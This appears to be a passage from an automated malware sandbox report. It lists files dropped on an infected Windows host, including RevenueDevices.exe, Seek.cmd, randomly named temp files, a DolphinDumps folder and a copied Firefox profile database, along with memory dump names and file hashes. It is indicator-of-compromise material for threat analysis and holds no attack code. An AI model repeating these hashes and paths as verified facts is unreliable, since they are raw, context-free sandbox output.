memory/1208-623-0x0000000004160000-0x00000000041BA000-memory.dmp

memory/1208-624-0x0000000004160000-0x00000000041BA000-memory.dmp

memory/1208-625-0x0000000004160000-0x00000000041BA000-memory.dmp

C:\Users\Admin\AppData\Local\temp\699

MD5 b65e9213dae00101a52d72b56120ff81
SHA1 d52caec94e56a19cca2bcc6e38dc780b1cb90027
SHA256 dfa7c49d13da53cc057bce84a0944d83258bf61671f92b2f7d0d9ee3e3896740
SHA512 09daf8969898babaaaa9ae8959b5345e204a27ff7b84f0bfb696b1e25130a9f659519a040eeaeae74c8c091586e76a6150743b30f419c0b1952c24c6c227584e

C:\Users\Admin\AppData\Local\temp\eofub

MD5 c00c81fedef0b80b43cc1db8de50c00c
SHA1 1ac21b1d5accb55cfa0abbbcf57f836aada49ee2
SHA256 a23c9f5563ad1c2019c59dde6eb4fa3442c0b5bbf83a279854a3ee3987c51e7b
SHA512 869551f28ffe1bb9ba906eaa94d9c54fd2197215510dbf5a4f053f71a45c189a570f27920ac3688862e21043854319718b6e028d25a4e453faad9770ede9c6d2

C:\Users\Admin\AppData\Local\temp\eaonl

MD5 65e07a754effe6ec11638a25447289a5
SHA1 948cbf6b970ffb432d8ebb1d367cee5afa826a83
SHA256 995338989bbeb5f5304a6c1fc13d75580a26bed964cc9f930e6d6dbc59fa5fd5
SHA512 67f896fe0b1a4385119351bd41a5d62fef03f261a32e2b347de2f2e1475a482bd366bc9cffa26690ec8105db0bc60267df2397d6b7ec4a9ca7ee49819552cfb6

C:\Users\Admin\AppData\Local\temp\xjpyn

MD5 2eaae68ca44390605379c1973a83c343
SHA1 4ce10b0c2717a631a53aca5e9daa7b0bf823c2e6
SHA256 1c8097e10cd7b6189a5e13e3b730e5e859675604eb8c459d7f7314d434cb9d8d
SHA512 cf365b466c2d8073b9df3495428a8e0183bec2d623372d4cfdfe58144e91b972c725b2c3430bc0d904d7cdd5e21c13f32af9b2148e6ed5da2ee9ff25994ea929

C:\Users\Admin\AppData\Roaming\DolphinDumps\azvw.exe

MD5 75375c22c72f1beb76bea39c22a1ed68
SHA1 e1652b058195db3f5f754b7ab430652ae04a50b8
SHA256 8d9b5190aace52a1db1ac73a65ee9999c329157c8e88f61a772433323d6b7a4a
SHA512 1b396e78e189185eefb8c6058aa7e6dfe1b8f2dff8babfe4ffbee93805467bf45760eea6efb8d9bb2040d0eaa56841d457b1976dcfe13ed67931ade01419f55a

C:\Users\Admin\AppData\Roaming\DolphinDumps\xhwq.zip

MD5 9e73fb50d37e37ee8bd19a8e3d2b82ca
SHA1 3db1c548e86e4bb7457324a3097b05da15b7ffc3
SHA256 68ba7122ee8d9ce34ed94b6036a171ce38d6d9d9b3a609c2f4de773f4dd40d5c
SHA512 b41209300f018103b0f8a4de0537f348a3bdfcbc8feb19e7fec6634b06c266cc442145fd2d9230f827f273b0d07bb6bbcab7a0f0e9e1f558e6dd7a076f568094

C:\Users\Admin\AppData\Local\temp\khxas

MD5 9b366ab497331d323faa5122fcef994a
SHA1 34e299517709fdad4043f66a8904bcadc034280b
SHA256 b115e6cad383c20d0424e148b378fbadfdf96a992d746f1dd11888f7582aa051
SHA512 9ef092da7cbc99e46a06747d8b82802378c45277cfee4ec8a71bedb3c6f74f49a904ad4f009475218e1ef28f4ca7d21e53c4f1d153ebd4ab58460812f34a74dc

C:\Users\Admin\AppData\Roaming\DolphinDumps\8CB16F

MD5 de7a7127a01956f6d0058d8a07062ead
SHA1 eb9125792d2dbd552edb9d5dc5751a85c8f82c7e
SHA256 36f6e8e860229e681ab960e7a5b979f64769058e981c18d8fe02204e39c3c333
SHA512 570a9245a1f874cc1ba144f6567222c724e7957865456b911552673fcf5c5910215df5c9490c831a9ef63ed1a947bb37ae881d5220ad20f9ebf2203f07018550

C:\Users\Admin\AppData\Local\temp\wasxo

MD5 7ec936af6bbf93cfd08de32eb291263d
SHA1 6216fc54e2b9ebdb416331aa344540846840f410
SHA256 bfab8d48cec02a93fec9bf66aa8cefe0d02ec305fd335bbbacbe61f996990b26
SHA512 f44c298e6aad646614c14260052d7327e0b1db33f1212df33f401179dc2ead348312d9006c635ee71346ffb3ba692dd829941a9ac894c43ee3be4c805dd8ad9e

C:\Users\Admin\AppData\Local\temp\bhgyc

MD5 beaabaaf1170504de9cb53de6ea6c43d
SHA1 738af18491bdc5f5f8eb581abf32be11f7b4bea0
SHA256 b3f0913bfb1c486cd263bf9540d89da3345387eedd5ec82ac939592e212fad90
SHA512 4731e8a631796596e6da6a30b5fd7f0c5dd26c9e906c33a5f9b58c82eb4e53167d5e748d5ae263ec8317c659735c8c06df09540ab71952d0947fdff4ff6cfd0c

C:\Users\Admin\AppData\Local\temp\nbpfi

MD5 9faead3fd586f150c4d8bf862eae33a6
SHA1 d6fee79b329461541d4bf7639da5932a9afb7b10
SHA256 51d99751dd2134bb485247ef29d3bb6c5b48ed08f61b2eb41f12e7e41638d8c1
SHA512 6b87f37253606b06cd9a244bb74318b95ce8719caa5623ef10b8c26c01529c60b917a76fc56ccf70275f40290993dec1d56284b39fe91910a9726a39df790269

C:\Users\Admin\AppData\Local\Temp\RevenueDevices.exe

MD5 b487b5b51436b42576d60a1fe58f8399
SHA1 4ff23fb37aaba96ac114fc54b397a902e4d9d650
SHA256 440fca4d671e78345ed1763f7904174effda3ecd567d7e20224e5910028b83c0
SHA512 de6974616095ecde0a222099d74fd08b307eb1213105053c14638a96fcb526c68fa53645d0b9359e1293b42af45b01226af7a373ac3a64709632c5d093c19ee5

C:\Users\Admin\AppData\Local\temp\dqxiv

MD5 17bcf11dc5f1fa6c48a1a856a72f1119
SHA1 873ec0cbd312762df3510b8cccf260dc0a23d709
SHA256 a7bf504871a46343c2feab9d923e01b9dca4e980b2e122ad55fd4dbb3f6c16d9
SHA512 9c12db4c6a105e767ff27048d2f8f19de5c9721ce6503dbb497aedcc1fc8b910a6fa43ec987fecd26794aff7440cb984744698fec5741dd73400a299dc3b2a25

C:\Users\Admin\AppData\Local\Temp\Seek.cmd

MD5 ea06d1bf2ac0ece898d348d4d0559255
SHA1 fc121d4832e0dcebed63e6af20d88b3d6406314c
SHA256 1ec9cc6b926282a80e3938d9a3dd0944cf79d1f3513b489b64ffdf1121e3595f
SHA512 9f65b3d381c992446e11749f498f3e37979b050a787d176f46b8158008f7cbde83c185133ee2f6deda8dec6a6c45548d6d91b419ffc4fa3dbf1a6d7d6233c3e4

C:\Users\Admin\AppData\Local\temp\sfqfo

MD5 d68110f2209ca9d816d2d9a9cb43c99a
SHA1 e88290a0c1073bb2def1db484542c3185ff4c214
SHA256 2c0825f4f2f074ada99512585846ef1ee3ce259c48ddb7882a8bbe80342e67af
SHA512 3ec77a1c042f693d8fb0776cd526cb8a7777b4d705165ed918fb9eb6151c64365ebc7aa7e7fd3194838be02d960d8e95be04be4c9edabddc877b90f8778b87a8

memory/1208-836-0x0000000004160000-0x00000000041BA000-memory.dmp

memory/1208-909-0x0000000004160000-0x00000000041BA000-memory.dmp

C:\Users\Admin\AppData\Local\temp\cuevq

MD5 3b2371bbc8689d946964740c79e82336
SHA1 0647163247d0d1d86f4ea48661dfe8e4dc002767
SHA256 2e5dd8a4d8089153af4a49f65fb3d8c5763b95f59a3b78a91167d50402f42a4f
SHA512 84487aec0dd7060c262722c8454415243ed8888e117e2817442d064f0a0c841eeb1af7b1d699640ea6acf3015f20d022f78a59ddda71311859547d8a600556f5

memory/1208-995-0x0000000004160000-0x00000000041BA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Weeks

MD5 26e155fc3ef2c17cd9e020224971d6b6
SHA1 b39303949cb9df0e79e7d379492ef985f9803bcd
SHA256 a587a7035e7ba1e0a687d365c7239724c2af5616826ee7cbe6b42c03ac89448b
SHA512 e7e19ff87e894d3eb0deb2a39c78e6c158350dd4e641a1ba7127ebc6120aed680ee86bfa06c448b6b640d3065ac5a5a4e7ae0ec7e7d97927c5256ba549230fd9

C:\Users\Admin\AppData\Local\Temp\Disco

MD5 5e0a36a6a1e6ceb0bd42ed9debde8666
SHA1 6f0e0881b517206eaef33364ca40b006038b5fe2
SHA256 1fbe941b779b8ee4152e224fe6856364b5b67bb7ecef9f81ede5dd7441165a3b
SHA512 7946f6a25406a15d83bd6be6d0fa542a9d0b6c01515362fe8e318d5fce5fc792c08aa163042deaf2de88ea79431175fb14c503288c12daf6a971a9a8ddc9c80d

C:\Users\Admin\AppData\Local\Temp\Norman

MD5 ac10591abc6e8218601573329d394545
SHA1 7ad13438209ab213dabcc5274425a75c8bb63b27
SHA256 e720bcd9b3fb4cd02e1f7c16ccdbf9017e1231f390976c9bc6592e3e878f630a
SHA512 34fc9287c42fe1626dd1150e49d172166c4b9e47287bb2d56994ac5b1f237e938cb332f3e0b0c94408e2473aaf6b29f8e7731de9fbd9d636320fb7238a6b2a4d

C:\Users\Admin\AppData\Local\Temp\Eight

MD5 7c7b509c91fd9da8ddfa9c3b5991c9eb
SHA1 61fb5cf74f58bde99c00a010e1a670beb85fd8ad
SHA256 c6e57103af0a2b2aca227a2b8683b6298711454a84ef57dc91fd35d279de9d64
SHA512 e56d32471a3c0b409a1b5a35065db89ace5f01928e915ab49a21242f74010c099f91f55272714f5f24c06824e5bbd0c4349de5bfdc6e385030defe0d726cd06a

C:\Users\Admin\AppData\Local\Temp\Considerations

MD5 fcc2e848da8d0beac27ba027ae23dc2a
SHA1 d4fae227cc35c806b7e06d85581fe7540ec4a9ca
SHA256 b2381bfddbbb5016607b0a66df94adc1b4552d6bb65682d492863c4e12a67e9b
SHA512 8c80def9f4b0c7f37aed52e7c2bc7602dc354cfefb0ca3e33704b07becb1ad3fe4828bf2f5c82ad000161dbc052e584105f305d67c1df5079d6e95b79e4f768f

C:\Users\Admin\AppData\Local\Temp\Bailey

MD5 c5c9551f30a44aab6152b932f7149053
SHA1 c5b31ed9091d873883a9ba4a1d19a1c8c50020f8
SHA256 ecc645d9ad7e7c4ad052e519f44d314ca15ce749fafd2be4384121704e1b26fd
SHA512 83dd79769dd3f0d0625742af94309fd5ded51615f9278cebb558e03777e5346baf08d3d6aa3c6c84df41a3e321bec83fad828c218e85f3e1d88276df17797e98

C:\Users\Admin\AppData\Local\Temp\Parts

MD5 d1da7b87f186d2f06637fdb6851e4043
SHA1 d84cd866c1f50d57fca2a0000c9e5231229866d1
SHA256 b91ff890af60c6aad4bb50fb9ed5a8593a8ed0ff26568732a130bb4da22baf09
SHA512 697608d39b19c2b9a617102a74377a438bf1d53430dc09a225d98d59ab3a65b807e12f84d464f335190047624cddb1452088b89fed15bb667c875feaa8bed1f8

C:\Users\Admin\AppData\Local\Temp\Showcase

MD5 3ae881aae44c0d99645eccd7c0476de2
SHA1 d888f63971c106ea70c94742259e4b012352c189
SHA256 53ad1ed80d9a1c61242f88da71ce874e3f23dba723a8bcd311a9c5611d9e6824
SHA512 46f11524a3bf7a9df6e020c349c241cb23e33250ca05e8047d4d9555dbdfa9e008673961298e645b5b1a64635fef9f8c2dd938b5e4496305013d1436cdf32659

C:\Users\Admin\AppData\Local\Temp\Samples

MD5 baca9a04dd19f20199c21c2ebf0374aa
SHA1 5df76c54fd5f02db7df46fb38ef41449430545d0
SHA256 4325fac47df15f794b41742445329e5028c09b85f56696b1b590b0e8c5fdec09
SHA512 39b10b8a6d9d55cacc30f8424e468f133eb599a29f1be3ce20563ddde0192fcdfae891beee9f64fef074a2d4113eea7f14bdbbcd662398f36cd8b5cb037c5973

C:\Users\Admin\AppData\Local\Temp\Shepherd

MD5 6f514c002da512210e64bb40b389938e
SHA1 2e18ff508f42efa8b771de5c6c4ab776b95f27e5
SHA256 f3612359dc4fcf6b5b1a1f7de8d01260b029fa5663decd830ea701f49d8f9254
SHA512 32b0420fb84921812b864367776fd8f8ebfa00799cb474673cda445448f7d60bbb43c2464622256b8ce5b45d58620e15c524b379914254c6a366896e5a9fe96e

C:\Users\Admin\AppData\Local\Temp\Subsection

MD5 c93af8f0303e164aed3cc9322f159daa
SHA1 d187a11d000a1cf0fa59efb54f4ffc231f7bef06
SHA256 63d5678c4e49212e030896980b1ae1088198fdb582bedbf4518f2b4b650a5f0b
SHA512 5f8388c1aaa4a06ae1ceafc10e0e2c53fc62a41d2eace3afcb59f102440274395b7a6464cf739fcd8ae164145d3143f726c3d76b09a2a0ef3b30fab7014885a8

memory/2412-1356-0x0000000004920000-0x0000000004991000-memory.dmp

memory/2412-1357-0x0000000004920000-0x0000000004991000-memory.dmp

memory/2412-1358-0x0000000004920000-0x0000000004991000-memory.dmp

memory/2412-1360-0x0000000004920000-0x0000000004991000-memory.dmp

memory/2412-1359-0x0000000004920000-0x0000000004991000-memory.dmp

memory/2412-1361-0x0000000004920000-0x0000000004991000-memory.dmp

memory/2412-1399-0x0000000061E00000-0x0000000061ED4000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy\Profiles\yuzka873.default-release\webappsstore.sqlite-shm

MD5 b7c14ec6110fa820ca6b65f5aec85911
SHA1 608eeb7488042453c9ca40f7e1398fc1a270f3f4
SHA256 fd4c9fda9cd3f9ae7c962b0ddf37232294d55580e1aa165aa06129b8549389eb
SHA512 d8d75760f29b1e27ac9430bc4f4ffcec39f1590be5aef2bfb5a535850302e067c288ef59cf3b2c5751009a22a6957733f9f80fa18f2b0d33d90c068a3f08f3b0

memory/2412-1498-0x0000000004920000-0x0000000004991000-memory.dmp

memory/2412-1492-0x0000000004920000-0x0000000004991000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\bqnfn

MD5 6e1571263e94c914fd16e33d548ac317
SHA1 637b78c843acb2108c62dffcee27a64cdd3cb343
SHA256 fc7aa783e72426a558bcfaf32fd92d91ce4aa4df8a4593a06c57c8bd595e27c5
SHA512 7fd3fb2a35f44b7d67b27793e9d7f06b73b931c89fd48295efab7ac434e999c4eeda87da1a9436b0858f2b4d762f23b47c153b4b5b11c98d04a50019c8c681cf